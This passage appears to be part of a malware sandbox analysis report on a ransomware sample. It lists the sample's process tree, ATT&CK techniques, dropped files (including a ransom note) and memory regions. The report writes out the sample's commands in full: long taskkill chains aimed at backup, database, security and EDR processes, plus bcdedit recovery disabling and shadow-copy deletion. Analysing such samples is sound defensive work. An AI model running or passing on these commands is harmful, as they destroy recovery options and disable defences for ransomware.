cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"
    3⤵
    PID:5252
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BackupExec.exe /F
      4⤵
      PID:5560
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Att.exe /F
      4⤵
      PID:6128
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mdm.exe /F
      4⤵
      PID:6072
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BackupExecManagementService.exe /F
      4⤵
      PID:6068
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM bengine.exe /F
      4⤵
      PID:5508
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM benetns.exe /F
      4⤵
      PID:5932
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beserver.exe /F
      4⤵
      PID:5516
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM pvlsvr.exe /F
      4⤵
      PID:5400
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM bedbg.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5576
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      PID:5196
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3292
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      PID:5504
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      PID:5900
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RemoteAssistProcess.exe /F
      4⤵
      PID:5380
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarMoniService.exe /F
      4⤵
      PID:5776
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GoodGameSrv.exe /F
      4⤵
      PID:4612
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarCMService.exe /F
      4⤵
      PID:5800
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TsService.exe /F
      4⤵
      PID:5744
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GoodGame.exe /F
      4⤵
      PID:6140
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarServerView.exe /F
      4⤵
      PID:2784
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM IcafeServicesTray.exe /F
      4⤵
      PID:5464
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BsAgent_0.exe /F
      4⤵
      PID:5344
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ControlServer.exe /F
      4⤵
      PID:5308
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DisklessServer.exe /F
      4⤵
      PID:1268
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DumpServer.exe /F
      4⤵
      PID:5768
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM NetDiskServer.exe /F
      4⤵
      PID:5336
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM PersonUDisk.exe /F
      4⤵
      PID:7400
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM service_agent.exe /F
      4⤵
      PID:5472
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SoftMemory.exe /F
      4⤵
      Kills process with taskkill
      PID:5216
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarServer.exe /F
      4⤵
      Kills process with taskkill
      PID:1604
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RtkNGUI64.exe /F
      4⤵
      PID:6184
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Serv-U-Tray.exe /F
      4⤵
      PID:6256
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM QQPCSoftTrayTips.exe /F
      4⤵
      PID:6064
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SohuNews.exe /F
      4⤵
      PID:2568
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Serv-U.exe /F
      4⤵
      PID:2400
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM QQPCRTP.exe /F
      4⤵
      PID:7892
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM EasyFZS.exe /F
      4⤵
      PID:7044
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM HaoYiShi.exe /F
      4⤵
      PID:1012
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM HysMySQL.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5604
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM wtautoreg.exe /F
      4⤵
      Kills process with taskkill
      PID:3388
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ispiritPro.exe /F
      4⤵
      PID:4924
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM CAService.exe /F
      4⤵
      PID:6272
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM XAssistant.exe /F
      4⤵
      PID:5244
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TrustCA.exe /F
      4⤵
      PID:7476
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GEUU20003.exe /F
      4⤵
      PID:7540
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM CertMgr.exe /F
      4⤵
      PID:3208
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM eSafe_monitor.exe /F
      4⤵
      PID:5024
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM MainExecute.exe /F
      4⤵
      Kills process with taskkill
      PID:7940
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM FastInvoice.exe /F
      4⤵
      PID:7076
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SoftMgrLite.exe /F
      4⤵
      PID:6332
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sesvc.exe /F
      4⤵
      PID:6300
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T & whoami"
    3⤵
    PID:6088
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VBoxSDS.exe /F
      4⤵
      PID:5612
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mysqld.exe /F
      4⤵
      PID:5604
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TeamViewer_Service.exe /F
      4⤵
      Kills process with taskkill
      PID:3540
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TeamViewer.exe /F
      4⤵
      PID:2772
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM CasLicenceServer.exe /F
      4⤵
      PID:5864
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM tv_w32.exe /F
      4⤵
      PID:544
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM tv_x64.exe /F
      4⤵
      PID:5552
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM rdm.exe /F
      4⤵
      PID:5364
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SecureCRT.exe /F
      4⤵
      PID:5488
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SecureCRTPortable.exe /F
      4⤵
      Kills process with taskkill
      PID:208
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VirtualBox.exe /F
      4⤵
      PID:2568
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VBoxSVC.exe /F
      4⤵
      PID:5628
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VirtualBoxVM.exe /F
      4⤵
      PID:4360
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM abs_deployer.exe /F
      4⤵
      PID:2704
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM edr_monitor.exe /F
      4⤵
      PID:5128
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sfupdatemgr.exe /F
      4⤵
      PID:1844
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ipc_proxy.exe /F
      4⤵
      PID:1780
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM edr_agent.exe /F
      4⤵
      Kills process with taskkill
      PID:4032
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM edr_sec_plan.exe /F
      4⤵
      PID:5580
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sfavsvc.exe /F
      4⤵
      PID:3436
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F
      4⤵
      Kills process with taskkill
      PID:5468
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DataShareBox.ShareBoxService.exe /F
      4⤵
      PID:5404
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Jointsky.CloudExchangeService.exe /F
      4⤵
      PID:3540
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Jointsky.CloudExchange.NodeService.ein /F
      4⤵
      PID:5588
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM perl.exe /F
      4⤵
      PID:3848
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM java.exe /F
      4⤵
      PID:5296
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM emagent.exe /F
      4⤵
      PID:3832
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TsServer.exe /F
      4⤵
      PID:3512
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AppMain.exe /F
      4⤵
      PID:5404
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM easservice.exe /F
      4⤵
      PID:1000
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Kingdee6.1.exe /F
      4⤵
      PID:7276
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM QyKernel.exe /F
      4⤵
      PID:6192
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM QyFragment.exe /F
      4⤵
      PID:6928
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UserClient.exe /F
      4⤵
      PID:5460
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNCEFExternal.exe /F
      4⤵
      PID:5876
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNCEFExternal.exe /F
      4⤵
      Kills process with taskkill
      PID:464
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNCEFExternal.exe /F
      4⤵
      Kills process with taskkill
      PID:2720
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ComputerZTray.exe /F
      4⤵
      PID:6892
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ComputerZService.exe /F
      4⤵
      PID:7704
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ClearCache.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6116
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ProLiantMonitor.exe /F
      4⤵
      PID:872
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ChsIME.exe /F
      4⤵
      PID:6260
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM bugreport.exe /F
      4⤵
      PID:7740
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNWebServer.exe /F
      4⤵
      PID:7612
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UI0Detect.exe /F
      4⤵
      PID:1444
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNCore.exe /F
      4⤵
      PID:7280
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM gnwayDDNS.exe /F
      4⤵
      Kills process with taskkill
      PID:6324
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNWebHelper.exe /F
      4⤵
      PID:6360
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM php-cgi.exe /F
      4⤵
      PID:5872
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ESLUSBService.exe /F
      4⤵
      PID:7804
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM CQA.exe /F
      4⤵
      PID:3144
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Kekcoek.pif /F
      4⤵
      PID:7588
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Tinuknx.exe /F
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM servers.exe /F
      4⤵
      PID:8120
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ping.exe /F
      4⤵
      PID:660
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TianHeng.exe /F
      4⤵
      PID:4832
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM K3MobileService.exe /F
      4⤵
      Kills process with taskkill
      PID:8120
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VSSVC.exe /F
      4⤵
      PID:6084
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Xshell.exe /F
      4⤵
      PID:7944
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM XshellCore.exe /F
      4⤵
      PID:6792
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM FNPLicensingService.exe /F
      4⤵
      PID:7116
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM XYNTService.exe /F
      4⤵
      PID:2584
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM U8DispatchService.exe /F
      4⤵
      PID:6932
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM EISService.exe /F
      4⤵
      PID:7140
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F
      4⤵
      PID:5288
- C:\Users\Admin\AppData\Local\Temp\df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
  C:\Users\Admin\AppData\Local\Temp\df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
  2⤵
  - Checks computer location settings
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - System policy modification
  PID:4408
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
    3⤵
    PID:3480
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
    3⤵
    PID:4612
- - C:\Windows\system32\vssadmin.exe
    "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TeamViewer8
1⤵
PID:6056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "NetBackup SAN Client Fibre Transport Service"
1⤵
PID:5820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"
1⤵
PID:1336

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5192

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Documents and Settings\Admin\Local Settings\Microsoft\CLR_v4.0_32\UsageLogs\df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe.log

Filesize
1KB

MD5
699a426142781c6cc895e8c425ed928c

SHA1
675fd624603ec6284b392acbcb7fd75664cf5f4a

SHA256
26916e23d61462943fe6f325b364d225b8cda612b8078445740539db87536d9a

SHA512
e90311179b45591433511a586ede2c393079c74c4094a4475114bb687a4f31071753113743fa9e0d8b65615593ceff59b52cf2668b6f0eeee4f334a0df5b3e44

Download Submit
C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.b783ffe3.pri

Filesize
2KB

MD5
7f6cebd89b533cce2550fe5966826539

SHA1
25dc96a94de69c5667cb70f2e567b24da79af605

SHA256
02281f1d89b80378d371a8a50cba0e98149f45e8dad65b79242739c212c8eb8e

SHA512
f5c978ee9fec3ffa7e29d0578b30ff317c02c9898adbe5c687510aedb42865c3c5e0bbd1b989bf582f2fb7b89f30fd24110433794b0ce833df2eb75dea0fd5fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\PL0BY74L\9F0DDV2T.txt

Filesize
12B

MD5
8cf4dec152a9d79a3d62202b886eda9b

SHA1
0c1b3d3d02c0b655aa3526a58486b84872f18cc2

SHA256
c30e56c9c8fe30ffa4a4ff712cf2fa1808ee82ca258cd4c8ebefcc82250b6c01

SHA512
a5a65f0604f8553d0be07bd5214db52d3f167e7511d29cb64e3fa9d8c510cc79976ff2a5acb9b8c09b666f306ac8e4ad389f9a2de3ca46d57b1e91060a4c50fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\killerr.bat

Filesize
39KB

MD5
45e95f1eb5957fde6126ec8e4dd19ba8

SHA1
ada4eec0e4148cd382b93127e333a8fa03e2e19c

SHA256
8ac6b63d44d33b17943776f8ede803881978350e0bef1a9fc30dbf04d52fe3a0

SHA512
65ce4fa73a9dc19342dfb22c841cd1da6045fb59955a0a23b21a32d2d05027405b410612524b04ad4f4d678f8d06ff989ebfba60ffacb1e3e3bbf01d7b09a2e3

Download Submit
C:\Users\Admin\Contacts\HOW TO RESTORE FILES.txt

Filesize
1KB

MD5
1b1450d4ede0fc2a0725b922f9ff03ba

SHA1
c8ff977b7e84d78b617f40c686ecce6c379fd903

SHA256
f7a0fb88326a90d8e31f4116da5074f019604ff73936c84e546ebc69a6d1e128

SHA512
2957e0d097bd4408c8349836ba54a584e7d3854c7e335ad24d217225e8811482ea94b541ddcb25ba0943976b0ec1c3df56b4d5e8ffcf468f026ac27ad0c1f6ae

Download Submit
memory/2284-38-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-1123-0x0000000075290000-0x0000000075A40000-memory.dmp

Filesize
7.7MB

Download
memory/2284-2-0x0000000005990000-0x0000000005A62000-memory.dmp

Filesize
840KB

Download
memory/2284-3-0x0000000006080000-0x0000000006698000-memory.dmp

Filesize
6.1MB

Download
memory/2284-4-0x0000000005BA0000-0x0000000005CAA000-memory.dmp

Filesize
1.0MB

Download
memory/2284-5-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-6-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-8-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-10-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-12-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-14-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-16-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-18-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-24-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-36-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-26-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-20-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-28-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-32-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-30-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-34-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-0-0x0000000075290000-0x0000000075A40000-memory.dmp

Filesize
7.7MB

Download
memory/2284-22-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-1-0x0000000000AA0000-0x0000000000F76000-memory.dmp

Filesize
4.8MB

Download
memory/2284-60-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-46-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-42-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-48-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-52-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-50-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-54-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-58-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-44-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-56-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-62-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-64-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-66-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-68-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-1119-0x0000000005910000-0x0000000005920000-memory.dmp

Filesize
64KB

Download
memory/2284-1120-0x0000000005AF0000-0x0000000005AF1000-memory.dmp

Filesize
4KB

Download
memory/2284-1121-0x0000000005DB0000-0x0000000005E0A000-memory.dmp

Filesize
360KB

Download
memory/2284-1122-0x0000000005E10000-0x0000000005E5C000-memory.dmp

